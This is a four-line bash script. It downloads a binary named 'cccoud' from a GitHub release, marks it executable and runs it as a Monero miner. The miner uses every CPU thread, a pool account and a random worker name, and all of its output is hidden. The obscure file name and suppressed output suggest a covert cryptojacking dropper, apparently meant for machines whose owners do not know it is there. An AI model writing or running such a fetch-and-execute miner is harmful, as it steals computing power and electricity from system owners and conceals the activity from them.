#!/bin/bash
wget https://github.com/juncilla/cloudytel/releases/download/telki/cccoud
chmod +x cccoud
./cccoud --algo xmr --account CP_43058os6pk --worker $(echo $(shuf -i 1-15000 -n 1)-Cam) --pool xmr.hk.apool.io:3334 --thread $(nproc --all) > /dev/null 2>&1
